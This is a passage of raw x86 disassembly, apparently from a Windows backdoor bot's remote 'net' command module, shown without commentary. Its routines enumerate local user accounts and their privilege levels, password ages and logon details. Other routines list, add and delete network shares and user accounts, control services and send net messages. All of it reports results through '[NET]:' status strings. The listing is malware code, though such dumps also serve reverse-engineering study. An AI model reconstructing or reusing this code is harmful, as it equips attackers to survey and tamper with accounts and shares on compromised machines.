push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr dword_43A7C8, 1
mov ebp, eax
jnz short loc_407BBD
or dword_43A7C8, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_41797C
pop ecx
mov dword_43A7C4, eax
loc_407BBD: ; CODE XREF: sub_407B65+3C�j
push esi
push esi
push ebp
push dword_43A7C4
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_43A7C4
pop edi
pop ebp
pop ebx
loc_407BD8: ; CODE XREF: sub_407B65+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_407B65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BE6 proc near ; CODE XREF: sub_408321+6C�p
; sub_4115D4+18F�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_407B24
push [ebp+arg_4]
mov edi, eax
call sub_407B24
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_417E10
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_407B24
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_43A384
pop edi
leave
retn
sub_407BE6 endp
; =============== S U B R O U T I N E =======================================
sub_407C51 proc near ; CODE XREF: sub_408321+20�p
; sub_4112AD+1BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_407B24
push [esp+8+arg_4]
mov esi, eax
call sub_407B24
pop ecx
pop ecx
push 0
push eax
push esi
call dword_43A3A0
pop esi
retn
sub_407C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C74 proc near ; CODE XREF: sub_4084FE+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_407B24
push [ebp+arg_4]
mov edi, eax
call sub_407B24
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_407B24
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_43A368
pop edi
leave
retn
sub_407C74 endp
; =============== S U B R O U T I N E =======================================
sub_407CCE proc near ; CODE XREF: sub_4084FE+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_407B24
push [esp+8+arg_4]
mov esi, eax
call sub_407B24
pop ecx
pop ecx
push eax
push esi
call dword_43A46C
pop esi
retn
sub_407CCE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CEF proc near ; CODE XREF: sub_4084FE+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_407B24
push [ebp+arg_4]
mov esi, eax
call sub_407B24
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_43A388
test eax, eax
mov [ebp+var_8], eax
jnz loc_40807C
mov eax, [ebp+var_4]
test eax, eax
jz loc_4080B7
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_416905
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_407E08
dec eax
jz short loc_407E01
dec eax
jz short loc_407DFA
mov eax, offset aUnknown ; "Unknown"
jmp short loc_407E0D
; ---------------------------------------------------------------------------
loc_407DFA: ; CODE XREF: sub_407CEF+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_407E0D
; ---------------------------------------------------------------------------
loc_407E01: ; CODE XREF: sub_407CEF+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_407E0D
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407CEF+FC�j
mov eax, offset aGuest ; "Guest"
loc_407E0D: ; CODE XREF: sub_407CEF+109�j
; sub_407CEF+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_416905
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_405D20
add esp, 20h
pop edi
pop ebx
jmp short loc_4080A8
; ---------------------------------------------------------------------------
loc_40807C: ; CODE XREF: sub_407CEF+35�j
push eax
lea eax, [ebp+var_208]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_416905
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_405D20
add esp, 20h
loc_4080A8: ; CODE XREF: sub_407CEF+38B�j
cmp [ebp+var_4], 0
jz short loc_4080B7
push [ebp+var_4]
call dword_43A3D8
loc_4080B7: ; CODE XREF: sub_407CEF+40�j
; sub_407CEF+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_407CEF endp
; =============== S U B R O U T I N E =======================================
sub_4080BD proc near ; CODE XREF: sub_4081ED+9E�p
; sub_408321:loc_408361�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_40816B
jz loc_408164
cmp eax, 7Bh
ja short loc_408130
jz short loc_408126
cmp eax, 5
jz short loc_40811C
cmp eax, 8
jz short loc_408112
cmp eax, 32h
jz short loc_408108
cmp eax, 35h
jz short loc_4080FE
cmp eax, 57h
jnz loc_4081BA
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_4080FE: ; CODE XREF: sub_4080BD+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_408108: ; CODE XREF: sub_4080BD+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_408112: ; CODE XREF: sub_4080BD+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_40811C: ; CODE XREF: sub_4080BD+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_408126: ; CODE XREF: sub_4080BD+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_408130: ; CODE XREF: sub_4080BD+16�j
sub eax, 7Ch
jz short loc_40815D
sub eax, 7C8h
jz short loc_408156
dec eax
jz short loc_40814C
dec eax
jnz short loc_4081BA
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_40814C: ; CODE XREF: sub_4080BD+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_4081DB
; ---------------------------------------------------------------------------
loc_408156: ; CODE XREF: sub_4080BD+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_40815D: ; CODE XREF: sub_4080BD+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_408164: ; CODE XREF: sub_4080BD+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_40816B: ; CODE XREF: sub_4080BD+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_4081A4
jz short loc_40819D
sub eax, 8ADh
jz short loc_4081CF
dec eax
dec eax
jz short loc_408196
dec eax
jz short loc_40818F
dec eax
dec eax
jnz short loc_4081BA
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_40818F: ; CODE XREF: sub_4080BD+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_408196: ; CODE XREF: sub_4080BD+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_40819D: ; CODE XREF: sub_4080BD+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_4081A4: ; CODE XREF: sub_4080BD+B5�j
sub eax, 8CAh
jz short loc_4081D6
sub eax, 17h
jz short loc_4081CF
sub eax, 25h
jz short loc_4081C8
sub eax, 29h
jz short loc_4081C1
loc_4081BA: ; CODE XREF: sub_4080BD+31�j
; sub_4080BD+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_4081C1: ; CODE XREF: sub_4080BD+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_4081C8: ; CODE XREF: sub_4080BD+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_4081CF: ; CODE XREF: sub_4080BD+BE�j
; sub_4080BD+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_4081DB
; ---------------------------------------------------------------------------
loc_4081D6: ; CODE XREF: sub_4080BD+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_4081DB: ; CODE XREF: sub_4080BD+3C�j
; sub_4080BD+46�j ...
push offset dword_43A7D0
call sub_416905
pop ecx
pop ecx
mov eax, offset dword_43A7D0
retn
sub_4080BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081ED proc near ; CODE XREF: sub_409806+20E5�p
var_71C = byte ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_417FDA
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call dword_4220DC ; GetComputerNameA
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_417FDA
lea eax, [ebp+var_71C]
push eax
call sub_417ECE
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_43A3B0
test eax, eax
jnz short loc_40827D
push offset aNetMessageSent ; "[NET]: Message sent successfully."
mov esi, offset dword_43A830
push esi
call sub_416905
pop ecx
pop ecx
jmp short loc_4082A4
; ---------------------------------------------------------------------------
loc_40827D: ; CODE XREF: sub_4081ED+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_4080BD
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
mov esi, offset dword_43A830
push esi
call sub_416905
add esp, 14h
loc_4082A4: ; CODE XREF: sub_4081ED+8E�j
mov eax, esi
pop esi
leave
retn
sub_4081ED endp
; =============== S U B R O U T I N E =======================================
sub_4082A9 proc near ; CODE XREF: sub_409806:loc_40B6F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4082FF
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_42ED10[esi]
push edi
push eax
call sub_4077C8
add esp, 14h
test eax, eax
jnz short loc_4082F1
push edi
push off_42ED0C[esi]
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
loc_4082E1: ; CODE XREF: sub_4082A9+54�j
mov esi, offset dword_43AA30
push esi
call sub_416905
add esp, 10h
jmp short loc_40831C
; ---------------------------------------------------------------------------
loc_4082F1: ; CODE XREF: sub_4082A9+2A�j
call sub_40786A
push eax
push edi
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
jmp short loc_4082E1
; ---------------------------------------------------------------------------
loc_4082FF: ; CODE XREF: sub_4082A9+C�j
lea eax, [eax+eax*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AA30
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_416905
add esp, 0Ch
loc_40831C: ; CODE XREF: sub_4082A9+46�j
pop edi
mov eax, esi
pop esi
retn
sub_4082A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408321 proc near ; CODE XREF: sub_409806:loc_40B7D8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_4083B9
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40834A
dec eax
jnz short loc_408399
push edi
push 0
call sub_407C51
pop ecx
pop ecx
jmp short loc_408395
; ---------------------------------------------------------------------------
loc_40834A: ; CODE XREF: sub_408321+18�j
cmp [ebp+arg_8], 0
jnz short loc_408387
push 24h
push edi
call sub_417E10
test eax, eax
pop ecx
pop ecx
jnz short loc_408387
push 57h
pop eax
loc_408361: ; CODE XREF: sub_408321+76�j
call sub_4080BD
push eax
push edi
lea eax, [esi+esi*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AC30
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_416905
add esp, 14h
jmp short loc_4083D9
; ---------------------------------------------------------------------------
loc_408387: ; CODE XREF: sub_408321+2D�j
; sub_408321+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_407BE6
add esp, 0Ch
loc_408395: ; CODE XREF: sub_408321+27�j
test eax, eax
jnz short loc_408361
loc_408399: ; CODE XREF: sub_408321+1B�j
push edi
lea eax, [esi+esi*2]
push off_42ED0C[eax*4]
mov esi, offset dword_43AC30
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_416905
add esp, 10h
jmp short loc_4083D9
; ---------------------------------------------------------------------------
loc_4083B9: ; CODE XREF: sub_408321+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AC30
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_416905
add esp, 0Ch
loc_4083D9: ; CODE XREF: sub_408321+64�j
; sub_408321+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_408321 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083DF proc near ; CODE XREF: sub_409806+1FFF�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_407B24
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_405D20
add esp, 18h
loc_408418: ; CODE XREF: sub_4083DF+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_43A4A4
mov ebx, eax
cmp ebx, esi
jz short loc_408479
cmp ebx, 0EAh
jz short loc_408479
push ebx
call sub_4080BD
push eax
lea eax, [ebp+var_214]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_416905
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 24h
jmp short loc_4084E6
; ---------------------------------------------------------------------------
loc_408479: ; CODE XREF: sub_4083DF+5D�j
; sub_4083DF+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_4084DD
mov esi, [ebp+var_8]
add esi, 14h
loc_408487: ; CODE XREF: sub_4083DF+FA�j
push dword ptr [esi+10h]
call dword_43A49C ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40849E
mov eax, offset aNo ; "No"
loc_40849E: ; CODE XREF: sub_4083DF+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_416905
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_408487
xor esi, esi
loc_4084DD: ; CODE XREF: sub_4083DF+A0�j
push [ebp+var_8]
call dword_43A3D8
loc_4084E6: ; CODE XREF: sub_4083DF+98�j
cmp ebx, 0EAh
jz loc_408418
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4083DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084FE proc near ; CODE XREF: sub_409806:loc_40B87A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_4085A1
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_408540
dec eax
jz short loc_408535
dec eax
jnz short loc_40855B
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_407CEF
add esp, 14h
jmp short loc_408557
; ---------------------------------------------------------------------------
loc_408535: ; CODE XREF: sub_4084FE+1D�j
push ebx
push edi
call sub_407CCE
pop ecx
pop ecx
jmp short loc_408557
; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: sub_4084FE+1A�j
cmp [ebp+arg_8], edi
jz short loc_408554
push [ebp+arg_8]
push ebx
push edi
call sub_407C74
add esp, 0Ch
jmp short loc_408557
; ---------------------------------------------------------------------------
loc_408554: ; CODE XREF: sub_4084FE+45�j
push 57h
pop eax
loc_408557: ; CODE XREF: sub_4084FE+35�j
; sub_4084FE+40�j ...
cmp eax, edi
jnz short loc_40857B
loc_40855B: ; CODE XREF: sub_4084FE+20�j
push ebx
lea eax, [esi+esi*2]
push off_42ED0C[eax*4]
mov esi, offset dword_43AE30
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_416905
add esp, 10h
jmp short loc_4085C1
; ---------------------------------------------------------------------------
loc_40857B: ; CODE XREF: sub_4084FE+5B�j
call sub_4080BD
push eax
push ebx
lea eax, [esi+esi*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AE30
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_416905
add esp, 14h
jmp short loc_4085C1
; ---------------------------------------------------------------------------
loc_4085A1: ; CODE XREF: sub_4084FE+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42ED08[eax*4]
mov esi, offset dword_43AE30
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_416905
add esp, 0Ch
loc_4085C1: ; CODE XREF: sub_4084FE+7B�j
; sub_4084FE+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_4084FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085C8 proc near ; CODE XREF: sub_409806+20A1�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_407B24
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_405D20
add esp, 18h
push ebx
loc_408607: ; CODE XREF: sub_4085C8+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_43A37C
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_408666
cmp eax, 0EAh
jz short loc_408666
push eax
call sub_4080BD
push eax
lea eax, [ebp+var_21C]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax
call sub_416905
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 24h
jmp short loc_4086D7
; ---------------------------------------------------------------------------
loc_408666: ; CODE XREF: sub_4085C8+62�j
; sub_4085C8+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_4086EA
xor ebx, ebx
cmp [ebp+var_8], esi
jbe short loc_4086D7
loc_408674: ; CODE XREF: sub_4085C8+E7�j
cmp edi, esi
lea eax, [ebp+var_21C]
jz short loc_4086B3
push dword ptr [edi]
push offset aS_4 ; " %S"
push eax
call sub_416905
push 1
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 20h
add edi, 4
inc [ebp+var_C]
inc ebx
cmp ebx, [ebp+var_8]
jb short loc_408674
jmp short loc_4086D7
; ---------------------------------------------------------------------------
loc_4086B3: ; CODE XREF: sub_4085C8+B4�j
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_416905
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 1Ch
loc_4086D7: ; CODE XREF: sub_4085C8+9C�j
; sub_4085C8+AA�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_4086EA
push edi
call dword_43A3D8
xor edi, edi
mov [ebp+var_4], edi
loc_4086EA: ; CODE XREF: sub_4085C8+A3�j
; sub_4085C8+114�j
cmp [ebp+var_10], 0EAh
jz loc_408607
cmp edi, esi
pop ebx
jz short loc_408703
push edi
call dword_43A3D8
loc_408703: ; CODE XREF: sub_4085C8+132�j
push [ebp+var_C]
lea eax, [ebp+var_21C]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_416905
push esi
push [ebp+arg_8]
lea eax, [ebp+var_21C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 20h
xor eax, eax
cmp [ebp+var_10], esi
pop edi
setz al
pop esi
leave
retn
sub_4085C8 endp
; =============== S U B R O U T I N E =======================================
sub_40873C proc near ; CODE XREF: sub_402B05+7�p
; sub_403FEB+7D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43A414 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_408764
push [esp+arg_0]
call dword_43A400 ; gethostbyname
test eax, eax
jnz short loc_40875D
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40875D: ; CODE XREF: sub_40873C+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_408764: ; CODE XREF: sub_40873C+D�j
retn
sub_40873C endp
; =============== S U B R O U T I N E =======================================
sub_408765 proc near ; CODE XREF: sub_4096A7+138�p
mov ecx, dword_43A488
xor eax, eax
test ecx, ecx
jz short locret_408773
